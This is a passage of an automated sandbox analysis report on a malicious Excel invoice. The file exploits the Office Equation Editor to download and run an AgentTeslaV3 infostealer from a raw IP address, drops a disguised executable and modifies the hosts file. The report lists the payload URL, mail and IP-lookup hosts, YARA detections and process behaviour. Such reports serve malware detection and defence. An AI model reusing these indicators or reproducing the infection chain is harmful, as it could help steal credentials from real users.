                  Source: regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
                  Source: regasm_svchost.exe, 00000006.00000002.1171153379.0000000007170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.signatur.rtr.at/current.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
                  Source: regasm_svchost.exe, 00000006.00000003.1135286709.000000000719E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                  Source: regasm_svchost.exe, 00000006.00000003.1135286709.000000000719E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                  Source: regasm_svchost.exe, 00000006.00000003.1135239617.000000000717E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
                  Source: regasm_svchost.exe, 00000006.00000003.1135272175.0000000007193000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                  Source: regasm_svchost.exe, 00000006.00000002.1171047083.00000000063DA000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135069641.00000000063D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
                  Source: regasm_svchost.exe, 00000006.00000003.1134833135.0000000006407000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.valicert.com/1
                  Source: regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135204507.00000000063D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
                  Source: regasm_svchost.exe, 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                  Source: regasm_svchost.exe, 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
                  Source: regasm_svchost.exe, 00000006.00000003.1134833135.0000000006407000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
                  Source: regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                  Source: regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1170516444.00000000027CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: regasm_svchost.exe, 00000006.00000002.1171192023.000000000719A000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                  Source: regasm_svchost.exe, 00000006.00000003.1135272175.0000000007193000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171166899.000000000717C000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171185695.0000000007195000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1135272175.0000000007193000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171166899.000000000717C000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171185695.0000000007195000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
                  Source: regasm_svchost.exe, 00000006.00000002.1171153379.0000000007170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                  Source: regasm_svchost.exe, 00000006.00000002.1171032156.00000000063CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.net/docs
                  Source: regasm_svchost.exe, 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55E8D614.wmfJump to behavior
                  Source: unknownDNS traffic detected: queries for: mail.bluemix.cl
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035704DE URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035704DE
                  Source: global trafficHTTP traffic detected: GET /ObliNMm2L89TSKT.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.174.138.192Connection: Keep-Alive

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Modifies the hosts file
                  Source: C:\Users\Public\regasm_svchost.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 6.2.regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 6.0.regasm_svchost.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 5.2.regasm_svchost.exe.3860770.5.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 6.0.regasm_svchost.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 5.2.regasm_svchost.exe.3860770.5.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 6.0.regasm_svchost.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 6.0.regasm_svchost.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 6.0.regasm_svchost.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 5.2.regasm_svchost.exe.37acd20.4.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Office equation editor drops PE file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\regasm_svchost.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ObliNMm2L89TSKT[1].exeJump to dropped file
                  .NET source code contains very large array initializations
                  Source: 6.0.regasm_svchost.exe.400000.9.unpack, u003cPrivateImplementationDetailsu003eu007bF4E9DFE3u002dF8F3u002d41FCu002dB96Cu002d8730A4AF5432u007d/E6DC0371u002dC852u002d4937u002d8582u002dBEDB15C72A37.csLarge array initialization: .cctor: array initializer size 11673
                  Source: 6.0.regasm_svchost.exe.400000.13.unpack, u003cPrivateImplementationDetailsu003eu007bF4E9DFE3u002dF8F3u002d41FCu002dB96Cu002d8730A4AF5432u007d/E6DC0371u002dC852u002d4937u002d8582u002dBEDB15C72A37.csLarge array initialization: .cctor: array initializer size 11673
                  Source: 6.0.regasm_svchost.exe.400000.7.unpack, u003cPrivateImplementationDetailsu003eu007bF4E9DFE3u002dF8F3u002d41FCu002dB96Cu002d8730A4AF5432u007d/E6DC0371u002dC852u002d4937u002d8582u002dBEDB15C72A37.csLarge array initialization: .cctor: array initializer size 11673
                  Source: 6.0.regasm_svchost.exe.400000.5.unpack, u003cPrivateImplementationDetailsu003eu007bF4E9DFE3u002dF8F3u002d41FCu002dB96Cu002d8730A4AF5432u007d/E6DC0371u002dC852u002d4937u002d8582u002dBEDB15C72A37.csLarge array initialization: .cctor: array initializer size 11673
                  .NET source code contains very large strings
                  Source: ObliNMm2L89TSKT[1].exe.2.dr, To_6u003a5u003cNu0024MQsu002d1u007dQDu0027PstVu003a4u0024.csLong String: Length: 20037
                  Source: regasm_svchost.exe.2.dr, To_6u003a5u003cNu0024MQsu002d1u007dQDu0027PstVu003a4u0024.csLong String: Length: 20037
                  Source: 5.0.regasm_svchost.exe.11e0000.0.unpack, To_6u003a5u003cNu0024MQsu002d1u007dQDu0027PstVu003a4u0024.csLong String: Length: 20037
                  Source: 5.2.regasm_svchost.exe.11e0000.2.unpack, To_6u003a5u003cNu0024MQsu002d1u007dQDu0027PstVu003a4u0024.csLong String: Length: 20037
                  Source: 6.0.regasm_svchost.exe.11e0000.8.unpack, To_6u003a5u003cNu0024MQsu002d1u007dQDu0027PstVu003a4u0024.csLong String: Length: 20037
                  Source: 6.0.regasm_svchost.exe.11e0000.0.unpack, To_6u003a5u003cNu0024MQsu002d1u007dQDu0027PstVu003a4u0024.csLong String: Length: 20037
                  Source: 6.0.regasm_svchost.exe.11e0000.2.unpack, To_6u003a5u003cNu0024MQsu002d1u007dQDu0027PstVu003a4u0024.csLong String: Length: 20037
                  Source: 6.0.regasm_svchost.exe.11e0000.10.unpack, To_6u003a5u003cNu0024MQsu002d1u007dQDu0027PstVu003a4u0024.csLong String: Length: 20037
                  Source: 6.0.regasm_svchost.exe.11e0000.4.unpack, To_6u003a5u003cNu0024MQsu002d1u007dQDu0027PstVu003a4u0024.csLong String: Length: 20037
                  Source: 6.2.regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 2.2.EQNEDT32.EXE.31daa8.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
                  Source: 6.0.regasm_svchost.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 5.2.regasm_svchost.exe.3860770.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 6.0.regasm_svchost.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 5.2.regasm_svchost.exe.3860770.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 6.0.regasm_svchost.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 6.0.regasm_svchost.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 6.0.regasm_svchost.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 5.2.regasm_svchost.exe.37acd20.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: Process Memory Space: regasm_svchost.exe PID: 2364, type: MEMORYSTRMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, score = file, reference = Internal Research
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_007C04705_2_007C0470
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_007CDC605_2_007CDC60
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_007C09285_2_007C0928
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_007C82C05_2_007C82C0
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_007C0E985_2_007C0E98
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_007CB7285_2_007CB728
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_007C09195_2_007C0919
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_007C0E885_2_007C0E88
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C525695_2_00C52569
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C51D205_2_00C51D20
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C53EC85_2_00C53EC8
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C5AE805_2_00C5AE80
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C52FC35_2_00C52FC3
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C5B3805_2_00C5B380
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C51CAC5_2_00C51CAC
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C564585_2_00C56458
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C564685_2_00C56468
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C53DD15_2_00C53DD1
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C50DD85_2_00C50DD8
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C5718C5_2_00C5718C
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C5A5A85_2_00C5A5A8
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C5D5205_2_00C5D520
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C5621D5_2_00C5621D
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C562205_2_00C56220
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C566385_2_00C56638
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C52A3B5_2_00C52A3B
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C55FE55_2_00C55FE5
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C55FE85_2_00C55FE8
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_0032C1E86_2_0032C1E8
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_003242A06_2_003242A0
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_003253FB6_2_003253FB
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_003245E86_2_003245E8
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_003216006_2_00321600
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_00329E586_2_00329E58
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_00324EB86_2_00324EB8
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_0032EEA06_2_0032EEA0
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_003281A06_2_003281A0
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_0032A6286_2_0032A628
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_0077ACB06_2_0077ACB0
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_0077D4B86_2_0077D4B8
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_007757E06_2_007757E0
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_0077B2606_2_0077B260
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_007754506_2_00775450
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_007786406_2_00778640
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_007712E06_2_007712E0
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_007786A06_2_007786A0
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_007723406_2_00772340
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_0077EB186_2_0077EB18
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_00775F906_2_00775F90
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_007C015C NtQueryInformationProcess,5_2_007C015C
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_007C0B70 NtQueryInformationProcess,5_2_007C0B70
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
                  Source: ObliNMm2L89TSKT[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: regasm_svchost.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Revised Invoice.xlsxVirustotal: Detection: 44%
                  Source: Revised Invoice.xlsxReversingLabs: Detection: 29%
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\regasm_svchost.exe "C:\Users\Public\regasm_svchost.exe"
                  Source: C:\Users\Public\regasm_svchost.exeProcess created: C:\Users\Public\regasm_svchost.exe {path}
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\regasm_svchost.exe "C:\Users\Public\regasm_svchost.exe" Jump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess created: C:\Users\Public\regasm_svchost.exe {path}Jump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Users\Public\regasm_svchost.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Revised Invoice.xlsxJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR643E.tmpJump to behavior
                  Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.winXLSX@6/30@5/2
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                  Source: 6.0.regasm_svchost.exe.400000.9.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 6.0.regasm_svchost.exe.400000.9.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 6.0.regasm_svchost.exe.400000.13.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 6.0.regasm_svchost.exe.400000.13.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 6.0.regasm_svchost.exe.400000.7.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 6.0.regasm_svchost.exe.400000.7.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\Public\regasm_svchost.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_011E4855 push cs; iretd 5_2_011E4867
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_011E6ECB push ebx; iretd 5_2_011E6ECC
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_007C98C2 push ss; retf 5_2_007C98C5
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_007C363D push ebx; iretd 5_2_007C363E
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_007C4FB4 push esi; retf 5_2_007C4FB7
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C54C98 push cs; retf 5_2_00C54C9A
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C54CA1 push cs; retf 5_2_00C54CA2
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C5319C push ss; ret 5_2_00C5319E
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C55E91 push ss; retf 5_2_00C55E92
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C55E98 push ss; retf 5_2_00C55E9A
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C54E50 push cs; retf 5_2_00C54E5A
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C54E19 push cs; retf 5_2_00C54E1A
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 5_2_00C58F9C push eax; ret 5_2_00C58F9D
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_011E4855 push cs; iretd 6_2_011E4867
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_011E6ECB push ebx; iretd 6_2_011E6ECC
                  Source: C:\Users\Public\regasm_svchost.exeCode function: 6_2_00323288 push C4003138h; iretd 6_2_0032328D
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.5985066148503515
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.5985066148503515
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\regasm_svchost.exeJump to dropped file
